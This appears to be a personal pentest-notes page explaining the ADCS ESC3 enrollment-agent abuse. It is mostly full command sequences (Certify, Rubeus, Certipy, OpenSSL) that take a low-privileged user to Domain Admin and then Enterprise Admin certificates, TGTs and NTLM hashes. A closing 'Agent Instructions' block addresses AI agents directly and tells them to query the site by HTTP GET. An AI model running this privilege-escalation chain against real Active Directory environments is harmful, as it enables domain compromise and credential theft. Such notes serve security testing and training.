# ESC3 ### What is ESC3? ESC3 is an Active Directory Certificate Services (ADCS) privilege escalation technique that abuses the **Certificate Request Agent** (Enrollment Agent) permission. When this EKU is misconfigured on accessible templates, a low-privileged user can receive a special *agent certificate* that authorises them to enrol into *any other certificate template* on behalf of any user including Domain Administrator. | Template 1 Enrollment Agent | Template 2 Target Template | | ------------------------------------------------------------------------------------ | ------------------------------------------------------------------------------------------------------------------------------------------- | | **Certificate Request Agent** | **Client Authentication** | | Grants the holder the ability to request certificates on behalf of other principals. |

Permits authentication. Must require authorised signatures (set to 1) + Certificate Request Agent EKU as issuance policy.


| | EKU: 1.3.6.1.4.1.311.20.2.1 | EKU: 1.3.6.1.5.5.7.3.2 | |

|

| {% hint style="info" icon="triangle-exclamation" %} Both templates must have enrollment rights for a user you control. Without that, the attack chain cannot begin. {% endhint %} ### Attack Flow
### Exploitation {% tabs %} {% tab title="Windows" %} Step 1 Enumerate vulnerable templates ```cmd Certify.exe find /vulnerable ``` Step 2 Request enrollment agent certificate (Template 1) Enrol in Template 1 to receive your enrollment agent certificate ```cmd Certify.exe request /ca:\ /template: /domain: ``` * Convert the output PEM to PFX using OpenSSL: ```cmd openssl pkcs12 -in esc3-enrollmentAgent.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3-enrollmentAgent.pfx ``` Step 3 Request TGT for controlled user (optional but recommended) * Get a TGT so subsequent requests use Kerberos auth ```cmd Rubeus.exe asktgt /user: /certificate:certstore.pfx /domain: /password:Passw0rd! /nowrap /ptt ``` \ Step 4 Enrol on behalf of Domain Admin (Template 2) * Use agent cert to request a DA certificate via Template 2 ```cmd Certify.exe request /ca:\ /template: /onbehalfof:domain\administrator /enrollcert:esc3-enrollmentAgent.pfx /enrollcertpw:Passw0rd! /domain: ``` * Convert this PEM too: ```cmd openssl pkcs12 -in esc3-DAenrollment.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out esc3-DAenrollment.pfx ``` Step 5 Request DA TGT and access DC ``` Rubeus.exe asktgt /user:administrator /certificate:esc3-DAenrollment.pfx /password:Passw0rd! /domain: /ptt ``` ``` # Verify access to DC winrs -r: whoami winrs -r: cmd ``` {% endtab %} {% tab title="Linux" %} Step 1 Enumerate with Certipy * Find vulnerable ADCS templates (use compromised user hash) ```bash certipy find -vulnerable -u certstore@cb.corp -hashes aad3b435b51404eeaad3b435b51404ee: -target cb-ca.cb.corp -stdout ``` Step 2 Request enrollment agent certificate (Template 1) * Enrol in the agent template sets -upn to admin for certificate subject ```bash certipy req -u certstore@cb.corp -hashes aad3b435b51404eeaad3b435b51404ee: -target cb-ca.cb.corp -dc-ip 172.16.67.1 -ca 'CB-CA' -template 'StoreDataRecovery-Agent' -upn administrator@domain.corp -out '/path/esc3-EnrollmentAgent-certipy' ``` Step 3 Enrol on behalf of Domain Admin (Template 2) * Use the agent .pfx to request a cert on-behalf-of DA ```bash certipy req -u certstore@cb.corp -hashes aad3b435b51404eeaad3b435b51404ee: -dc-ip 172.16.10.1 -ca 'CB-CA' -template 'StoreDataRecovery' -on-behalf-of 'domain\administrator' -pfx '/path/esc3-EnrollmentAgent-certipy.pfx' -out '/path/esc3-DAEnrollment-certipy' -timeout 30 ``` Step 4 Authenticate as DA (UnPAC-the-Hash) * Use DA certificate to authenticate dumps NTLM hash via UnPAC-the-Hash ```bash certipy auth -pfx '/path/esc3-DAEnrollment-certipy.pfx' ``` ***Bonus Escalate to Enterprise Admin*** * Reuse the same agent cert target cb\administrator (root domain) ```bash certipy req -u certstore@cb.corp -hashes aad3b435b51404eeaad3b435b51404ee: -dc-ip 172.16.10.1 -ca 'CB-CA' -template 'StoreDataRecovery' -on-behalf-of 'cb\administrator' -pfx '/path/esc3-EnrollmentAgent-certipy.pfx' -out '/path/esc3-EAEnrollment-certipy' certipy auth -pfx '/path/esc3-EAEnrollment-certipy.pfx' ``` {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://l1nuxkid.gitbook.io/l1nuxkid-docs/active-directory-certificate-services-ad-cs/esc3.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.